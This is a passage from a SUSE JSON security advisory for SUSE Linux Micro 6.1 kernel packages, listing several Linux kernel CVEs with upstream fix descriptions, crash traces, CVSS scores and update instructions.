"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53839"
},
{
"cve": "CVE-2023-53841",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53841"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndevlink: report devlink_port_type_warn source device\n\ndevlink_port_type_warn is scheduled for port devlink and warning\nwhen the port type is not set. But from this warning it is not easy\nfound out which device (driver) has no devlink port set.\n\n[ 3709.975552] Type was not set for devlink port.\n[ 3709.975579] WARNING: CPU: 1 PID: 13092 at net/devlink/leftover.c:6775 devlink_port_type_warn+0x11/0x20\n[ 3709.993967] Modules linked in: openvswitch nf_conncount nf_nat nf_conntrack nf_defrag_ipv6 nf_defrag_ipv4 nfnetlink bluetooth rpcsec_gss_krb5 auth_rpcgss nfsv4 dns_resolver nfs lockd grace fscache netfs vhost_net vhost vhost_iotlb tap tun bridge stp llc qrtr intel_rapl_msr intel_rapl_common i10nm_edac nfit libnvdimm x86_pkg_temp_thermal mlx5_ib intel_powerclamp coretemp dell_wmi ledtrig_audio sparse_keymap ipmi_ssif kvm_intel ib_uverbs rfkill ib_core video kvm iTCO_wdt acpi_ipmi intel_vsec irqbypass ipmi_si iTCO_vendor_support dcdbas ipmi_devintf mei_me ipmi_msghandler rapl mei intel_cstate isst_if_mmio isst_if_mbox_pci dell_smbios intel_uncore isst_if_common i2c_i801 dell_wmi_descriptor wmi_bmof i2c_smbus intel_pch_thermal pcspkr acpi_power_meter xfs libcrc32c sd_mod sg nvme_tcp mgag200 i2c_algo_bit nvme_fabrics drm_shmem_helper drm_kms_helper nvme syscopyarea ahci sysfillrect sysimgblt nvme_core fb_sys_fops crct10dif_pclmul libahci mlx5_core sfc crc32_pclmul nvme_common drm\n[ 3709.994030] crc32c_intel mtd t10_pi mlxfw libata tg3 mdio megaraid_sas psample ghash_clmulni_intel pci_hyperv_intf wmi dm_multipath sunrpc dm_mirror dm_region_hash dm_log dm_mod be2iscsi bnx2i cnic uio cxgb4i cxgb4 tls libcxgbi libcxgb qla4xxx iscsi_boot_sysfs iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi fuse\n[ 3710.108431] CPU: 1 PID: 13092 Comm: kworker/1:1 Kdump: loaded Not tainted 5.14.0-319.el9.x86_64 #1\n[ 3710.108435] Hardware name: Dell Inc. PowerEdge R750/0PJ80M, BIOS 1.8.2 09/14/2022\n[ 3710.108437] Workqueue: events devlink_port_type_warn\n[ 3710.108440] RIP: 0010:devlink_port_type_warn+0x11/0x20\n[ 3710.108443] Code: 84 76 fe ff ff 48 c7 03 20 0e 1a ad 31 c0 e9 96 fd ff ff 66 0f 1f 44 00 00 0f 1f 44 00 00 48 c7 c7 18 24 4e ad e8 ef 71 62 ff \u003c0f\u003e 0b c3 cc cc cc cc 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 f6 87\n[ 3710.108445] RSP: 0018:ff3b6d2e8b3c7e90 EFLAGS: 00010282\n[ 3710.108447] RAX: 0000000000000000 RBX: ff366d6580127080 RCX: 0000000000000027\n[ 3710.108448] RDX: 0000000000000027 RSI: 00000000ffff86de RDI: ff366d753f41f8c8\n[ 3710.108449] RBP: ff366d658ff5a0c0 R08: ff366d753f41f8c0 R09: ff3b6d2e8b3c7e18\n[ 3710.108450] R10: 0000000000000001 R11: 0000000000000023 R12: ff366d753f430600\n[ 3710.108451] R13: ff366d753f436900 R14: 0000000000000000 R15: ff366d753f436905\n[ 3710.108452] FS: 0000000000000000(0000) GS:ff366d753f400000(0000) knlGS:0000000000000000\n[ 3710.108453] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 3710.108454] CR2: 00007f1c57bc74e0 CR3: 000000111d26a001 CR4: 0000000000773ee0\n[ 3710.108456] PKRU: 55555554\n[ 3710.108457] Call Trace:\n[ 3710.108458] \u003cTASK\u003e\n[ 3710.108459] process_one_work+0x1e2/0x3b0\n[ 3710.108466] ? rescuer_thread+0x390/0x390\n[ 3710.108468] worker_thread+0x50/0x3a0\n[ 3710.108471] ? rescuer_thread+0x390/0x390\n[ 3710.108473] kthread+0xdd/0x100\n[ 3710.108477] ? kthread_complete_and_exit+0x20/0x20\n[ 3710.108479] ret_from_fork+0x1f/0x30\n[ 3710.108485] \u003c/TASK\u003e\n[ 3710.108486] ---[ end trace 1b4b23cd0c65d6a0 ]---\n\nAfter patch:\n[ 402.473064] ice 0000:41:00.0: Type was not set for devlink port.\n[ 402.473064] ice 0000:41:00.1: Type was not set for devlink port.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53841",
"url": "https://www.suse.com/security/cve/CVE-2023-53841"
},
{
"category": "external",
"summary": "SUSE Bug 1255009 for CVE-2023-53841",
"url": "https://bugzilla.suse.com/1255009"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 2.5,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "low"
}
],
"title": "CVE-2023-53841"
},
{
"cve": "CVE-2023-53842",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53842"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: codecs: wcd-mbhc-v2: fix resource leaks on component remove\n\nThe MBHC resources must be released on component probe failure and\nremoval so can not be tied to the lifetime of the component device.\n\nThis is specifically needed to allow probe deferrals of the sound card\nwhich otherwise fails when reprobing the codec component:\n\n snd-sc8280xp sound: ASoC: failed to instantiate card -517\n genirq: Flags mismatch irq 299. 00002001 (mbhc sw intr) vs. 00002001 (mbhc sw intr)\n wcd938x_codec audio-codec: Failed to request mbhc interrupts -16\n wcd938x_codec audio-codec: mbhc initialization failed\n wcd938x_codec audio-codec: ASoC: error at snd_soc_component_probe on audio-codec: -16\n snd-sc8280xp sound: ASoC: failed to instantiate card -16",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53842",
"url": "https://www.suse.com/security/cve/CVE-2023-53842"
},
{
"category": "external",
"summary": "SUSE Bug 1254690 for CVE-2023-53842",
"url": "https://bugzilla.suse.com/1254690"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53842"
},
{
"cve": "CVE-2023-53843",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53843"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: openvswitch: reject negative ifindex\n\nRecent changes in net-next (commit 759ab1edb56c (\"net: store netdevs\nin an xarray\")) refactored the handling of pre-assigned ifindexes\nand let syzbot surface a latent problem in ovs. ovs does not validate\nifindex, making it possible to create netdev ports with negative\nifindex values. It\u0027s easy to repro with YNL:\n\n$ ./cli.py --spec netlink/specs/ovs_datapath.yaml \\\n --do new \\\n\t --json \u0027{\"upcall-pid\": 1, \"name\":\"my-dp\"}\u0027\n$ ./cli.py --spec netlink/specs/ovs_vport.yaml \\\n\t --do new \\\n\t --json \u0027{\"upcall-pid\": \"00000001\", \"name\": \"some-port0\", \"dp-ifindex\":3,\"ifindex\":4294901760,\"type\":2}\u0027\n\n$ ip link show\n-65536: some-port0: \u003cBROADCAST,MULTICAST\u003e mtu 1500 qdisc noop state DOWN mode DEFAULT group default qlen 1000\n link/ether 7a:48:21:ad:0b:fb brd ff:ff:ff:ff:ff:ff\n...\n\nValidate the inputs. Now the second command correctly returns:\n\n$ ./cli.py --spec netlink/specs/ovs_vport.yaml \\\n\t --do new \\\n\t --json \u0027{\"upcall-pid\": \"00000001\", \"name\": \"some-port0\", \"dp-ifindex\":3,\"ifindex\":4294901760,\"type\":2}\u0027\n\nlib.ynl.NlError: Netlink error: Numerical result out of range\nnl_len = 108 (92) nl_flags = 0x300 nl_type = 2\n\terror: -34\textack: {\u0027msg\u0027: \u0027integer out of range\u0027, \u0027unknown\u0027: [[type:4 len:36] b\u0027\\x0c\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x03\\x00\\xff\\xff\\xff\\x7f\\x00\\x00\\x00\\x00\\x08\\x00\\x01\\x00\\x08\\x00\\x00\\x00\u0027], \u0027bad-attr\u0027: \u0027.ifindex\u0027}\n\nAccept 0 since it used to be silently ignored.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53843",
"url": "https://www.suse.com/security/cve/CVE-2023-53843"
},
{
"category": "external",
"summary": "SUSE Bug 1254705 for CVE-2023-53843",
"url": "https://bugzilla.suse.com/1254705"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53843"
},
{
"cve": "CVE-2023-53844",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53844"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/ttm: Don\u0027t leak a resource on swapout move error\n\nIf moving the bo to system for swapout failed, we were leaking\na resource. Fix.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-53844",
"url": "https://www.suse.com/security/cve/CVE-2023-53844"
},
{
"category": "external",
"summary": "SUSE Bug 1254649 for CVE-2023-53844",
"url": "https://bugzilla.suse.com/1254649"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2023-53844"
},
{
"cve": "CVE-2023-53846",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-53846"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nf2fs: fix to do sanity check on direct node in truncate_dnode()\n\nsyzbot reports below bug:\n\nBUG: KASAN: slab-use-after-free in f2fs_truncate_data_blocks_range+0x122a/0x14c0 fs/f2fs/file.c:574\nRead of size 4 at addr ffff88802a25c000 by task syz-executor148/5000\n\nCPU: 1 PID: 5000 Comm: syz-executor148 Not tainted 6.4.0-rc7-syzkaller-00041-ge660abd551f1 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 05/27/2023\nCall Trace:\n \u003cTASK\u003e\n __dump_stack lib/dump_stack.c:88 [inline]\n dump_stack_lvl+0xd9/0x150 lib/dump_stack.c:106\n print_address_description.constprop.0+0x2c/0x3c0 mm/kasan/report.c:351\n print_report mm/kasan/report.c:462 [inline]\n kasan_report+0x11c/0x130 mm/kasan/report.c:572\n f2fs_truncate_data_blocks_range+0x122a/0x14c0 